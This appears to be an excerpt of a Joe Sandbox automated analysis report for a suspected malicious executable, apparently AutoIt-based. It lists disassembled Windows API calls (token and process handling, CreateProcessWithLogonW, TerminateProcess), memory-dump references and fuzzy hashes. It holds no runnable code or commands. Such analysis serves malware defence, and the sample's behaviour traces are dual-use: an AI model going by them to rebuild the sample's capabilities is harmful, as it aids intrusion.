                                                                                                                  • Part of subcall function 006580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006580F6
                                                                                                                • GetLengthSid.ADVAPI32(?,00000000,0065842F), ref: 006588CA
                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 006588D6
                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 006588DD
                                                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 006588F6
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,0065842F), ref: 0065890A
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00658911
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                • String ID:
                                                                                                                • API String ID: 3008561057-0
                                                                                                                • Opcode ID: 57d546b196c8f6de59cf614aed26dc92e7e9f877f60bcec46448afa17786b191
                                                                                                                • Instruction ID: d17c205ebb35fdda639fef3efc41d3dbeaf33fdf7f7752ddc75b88443ba9607f
                                                                                                                • Opcode Fuzzy Hash: 57d546b196c8f6de59cf614aed26dc92e7e9f877f60bcec46448afa17786b191
                                                                                                                • Instruction Fuzzy Hash: B211B131501209FFDB109FA8DC09BFEB77AEB44316F104128E885E7210CB32AD18DB60
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006585E2
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 006585E9
                                                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006585F8
                                                                                                                • CloseHandle.KERNEL32(00000004), ref: 00658603
                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00658632
                                                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00658646
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                • String ID:
                                                                                                                • API String ID: 1413079979-0
                                                                                                                • Opcode ID: 021ad615f3a458e190358c2ae3c50dc7c214d5cb09a03ea44995aed6680dc596
                                                                                                                • Instruction ID: 0903e614ebc92eb0d721afa694c75fa61026dd2025c18ddc2c8725e8f9df0bca
                                                                                                                • Opcode Fuzzy Hash: 021ad615f3a458e190358c2ae3c50dc7c214d5cb09a03ea44995aed6680dc596
                                                                                                                • Instruction Fuzzy Hash: D2115972501209BFDF018FA4ED49FEE7BAAEF48305F144164FE04A2160C7728E65EB60
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 0065B7B5
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0065B7C6
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0065B7CD
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0065B7D5
                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0065B7EC
                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0065B7FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Release
                                                                                                                • String ID:
                                                                                                                • API String ID: 1035833867-0
                                                                                                                • Opcode ID: 041dd40cc4511caba3ba6395cb65dd77fedf8f92d69fb57b1a21b73c01d10eb8
                                                                                                                • Instruction ID: d0dca4e8bca8a6da74b5a042d089ec97adc53789c8d19a64a2c4860df2c92cae
                                                                                                                • Opcode Fuzzy Hash: 041dd40cc4511caba3ba6395cb65dd77fedf8f92d69fb57b1a21b73c01d10eb8
                                                                                                                • Instruction Fuzzy Hash: 1D018475E00209BBEF109BA69C49A5EBFB9EB4C311F004175FE04A7291D6319C10CF90
                                                                                                                APIs
                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00620193
                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 0062019B
                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006201A6
                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006201B1
                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 006201B9
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 006201C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4278518827-0
                                                                                                                • Opcode ID: c8ce5e51924d6c0b2d98f57fdacc3e3a7c583f7c2996e29096ff11bfe3098502
                                                                                                                • Instruction ID: 52b73b378a183050eee603c40363860a249c3615448359fcb5683e8554e6589a
                                                                                                                • Opcode Fuzzy Hash: c8ce5e51924d6c0b2d98f57fdacc3e3a7c583f7c2996e29096ff11bfe3098502
                                                                                                                • Instruction Fuzzy Hash: 02016CB09417597DE3008F5A8C85B52FFA8FF19354F00421BA15C87941C7F5A864CBE5
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006653F9
                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0066540F
                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0066541E
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0066542D
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00665437
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0066543E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 839392675-0
                                                                                                                • Opcode ID: e4ba6bdfb3aaa060c78c58e0fc4e4066b1ed364101e41a26d02267fc2ac9ecd4
                                                                                                                • Instruction ID: da6c7bb6ec4471889e2634f9d594e165de1e0f2ab0f76849bbd407c8d6ff3c9b
                                                                                                                • Opcode Fuzzy Hash: e4ba6bdfb3aaa060c78c58e0fc4e4066b1ed364101e41a26d02267fc2ac9ecd4
                                                                                                                • Instruction Fuzzy Hash: CAF09032240158BBE3205BA2DC0EEEF7B7DEFCAB11F000369FA04D1050EBA01A4187B5
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00667243
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,00610EE4,?,?), ref: 00667254
                                                                                                                • TerminateThread.KERNEL32(00000000,000001F6,?,00610EE4,?,?), ref: 00667261
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00610EE4,?,?), ref: 0066726E
                                                                                                                  • Part of subcall function 00666C35: CloseHandle.KERNEL32(00000000,?,0066727B,?,00610EE4,?,?), ref: 00666C3F
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00667281
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00610EE4,?,?), ref: 00667288
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 3495660284-0
                                                                                                                • Opcode ID: a75caf38f1a0dcf7832a177602a4ab4cc9c266c531dbb972171d4ed3a4966c2d
                                                                                                                • Instruction ID: 8f4f0de8e7816544eab39eaef748d5786e17fc514af6452994a1f1cbd2837594
                                                                                                                • Opcode Fuzzy Hash: a75caf38f1a0dcf7832a177602a4ab4cc9c266c531dbb972171d4ed3a4966c2d
                                                                                                                • Instruction Fuzzy Hash: 82F05E36540612FBD7511BA4ED5C9DB773BEF45702F101631F603A10A0DB7A5A11CB50
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0065899D
                                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 006589A9
                                                                                                                • CloseHandle.KERNEL32(?), ref: 006589B2
                                                                                                                • CloseHandle.KERNEL32(?), ref: 006589BA
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 006589C3
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 006589CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 146765662-0
                                                                                                                • Opcode ID: 0abe057741b9079191b566f56b8278fb96e8349dbc93dfe117031a251d21f99a
                                                                                                                • Instruction ID: f13235abed3b48c4496d8f75ffa8664514502075af5ca91ac6e19c98650edb84
                                                                                                                • Opcode Fuzzy Hash: 0abe057741b9079191b566f56b8278fb96e8349dbc93dfe117031a251d21f99a
                                                                                                                • Instruction Fuzzy Hash: 25E05276104505FBDB011FE5EC0C95ABB7AFB89762B509731F219C1474CB329461DB90
                                                                                                                APIs
                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00692C7C,?), ref: 006576EA
                                                                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00692C7C,?), ref: 00657702
                                                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,0068FB80,000000FF,?,00000000,00000800,00000000,?,00692C7C,?), ref: 00657727
                                                                                                                • _memcmp.LIBCMT ref: 00657748
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromProg$FreeTask_memcmp
                                                                                                                • String ID: ,,i
                                                                                                                • API String ID: 314563124-3276395716
                                                                                                                • Opcode ID: d3d3d1fb1df0d621a5b63b272fcc574312426b1e4eba54a199881e52d9377ea2
                                                                                                                • Instruction ID: d96ec1107fa43700cfbf912436dc6fc441e7dbf8165484a2931aaf626ee614fb
                                                                                                                • Opcode Fuzzy Hash: d3d3d1fb1df0d621a5b63b272fcc574312426b1e4eba54a199881e52d9377ea2
                                                                                                                • Instruction Fuzzy Hash: 1981ED75A00109EFCB04DFA4D984DEEB7BAFF89315F204558F505AB250DB71AE4ACB60
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00678613
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00678722
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0067889A
                                                                                                                  • Part of subcall function 00667562: VariantInit.OLEAUT32(00000000), ref: 006675A2
                                                                                                                  • Part of subcall function 00667562: VariantCopy.OLEAUT32(00000000,?), ref: 006675AB
                                                                                                                  • Part of subcall function 00667562: VariantClear.OLEAUT32(00000000), ref: 006675B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                • API String ID: 4237274167-1221869570
                                                                                                                • Opcode ID: d1dccf02338f44ac56c6aad9fe58855906ff8e1645f896b0b39af1a8a27814f9
                                                                                                                • Instruction ID: a9919fe0623b222af47804d4721b550262ae715e78348eab44741643ffa81cd2
                                                                                                                • Opcode Fuzzy Hash: d1dccf02338f44ac56c6aad9fe58855906ff8e1645f896b0b39af1a8a27814f9
                                                                                                                • Instruction Fuzzy Hash: 22917D706443019FCB54DF24C48495BBBE6EF89714F14896EF89A8B3A2DB30ED46CB52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0061FC86: _wcscpy.LIBCMT ref: 0061FCA9
                                                                                                                • _memset.LIBCMT ref: 00662B87
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00662BB6
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00662C69
                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00662C97
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 4152858687-4108050209
                                                                                                                • Opcode ID: a9a4c1e72b521d39dc9181958c4c9e03293950cdfdace6adb69371e45ddd8be4
                                                                                                                • Instruction ID: 21a0c46f7c5cd7f03bed06dc7580aff97db2111d6827c5102be73aa76d6c905d
                                                                                                                • Opcode Fuzzy Hash: a9a4c1e72b521d39dc9181958c4c9e03293950cdfdace6adb69371e45ddd8be4
                                                                                                                • Instruction Fuzzy Hash: 3251E071208B029FD7A49F28D864AAFB7EAEF94310F040A2DF881D7290DB70CC44CB56
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$_free
                                                                                                                • String ID: 3ca$_a
                                                                                                                • API String ID: 2620147621-1000881220
                                                                                                                • Opcode ID: 6bdd36878b432bdc5f82eab823fe24391bc112bc53abe5cdda837f43cfe3823f
                                                                                                                • Instruction ID: 99e9459d7a462524bd0ebd2af0e2699b7e21fde9c7d9be9fbf6b272736eb2164
                                                                                                                • Opcode Fuzzy Hash: 6bdd36878b432bdc5f82eab823fe24391bc112bc53abe5cdda837f43cfe3823f
                                                                                                                • Instruction Fuzzy Hash: 8A515B716087519FDB65CF28C451BAABBE6EF85310F08482DE98AD7361DB31E941CB42
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$_memmove
                                                                                                                • String ID: 3ca$ERCP
                                                                                                                • API String ID: 2532777613-1343919959
                                                                                                                • Opcode ID: 39ee015463f775cbf45b290100ae3a86901e716c9fbe11be6f7614dd198448c8
                                                                                                                • Instruction ID: f88791921a5bbc8042c8e9a4697ae0e82480620910dc505b2a38afe65dc58a25
                                                                                                                • Opcode Fuzzy Hash: 39ee015463f775cbf45b290100ae3a86901e716c9fbe11be6f7614dd198448c8
                                                                                                                • Instruction Fuzzy Hash: EF51C075A00705DBDB24CFA5C981BEABBF6EF04304F24456EE94ACB241E770EA85CB50
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 006627C0
                                                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006627DC
                                                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00662822
                                                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006C5890,00000000), ref: 0066286B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1173514356-4108050209
                                                                                                                • Opcode ID: b77d01f6f44e05f4aaec8e4300219bfc9c92d687187b8fe079a5c008358137b7
                                                                                                                • Instruction ID: 6e9772dcf5d0fb45bee6b46244ee16b192e5368c82dc3c37f214863a30c1e9d7
                                                                                                                • Opcode Fuzzy Hash: b77d01f6f44e05f4aaec8e4300219bfc9c92d687187b8fe079a5c008358137b7
                                                                                                                • Instruction Fuzzy Hash: 8F41A070604702AFD724DF28CC94B5ABBEAEF95314F044A2DF865973D1D730A809CB66
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0067D7C5
                                                                                                                  • Part of subcall function 0060784B: _memmove.LIBCMT ref: 00607899
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharLower_memmove
                                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                                • API String ID: 3425801089-567219261
                                                                                                                • Opcode ID: b9b1f3990157351d711ff1ff10736064fb47e391b9d3dae3160b3181450bff9e
                                                                                                                • Instruction ID: 8616e3f10acc7813f5d6f388ea7c3323f0c770dc09650932993701321a09d97d
                                                                                                                • Opcode Fuzzy Hash: b9b1f3990157351d711ff1ff10736064fb47e391b9d3dae3160b3181450bff9e
                                                                                                                • Instruction Fuzzy Hash: 71319E71904619ABCF04EF54C8919EEB7B6FF04320B108A2DE82A977D2DB71A905CB90
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22
                                                                                                                  • Part of subcall function 0065AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0065AABC
                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00658F14
                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00658F27
                                                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00658F57
                                                                                                                  • Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$_memmove$ClassName
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 365058703-1403004172
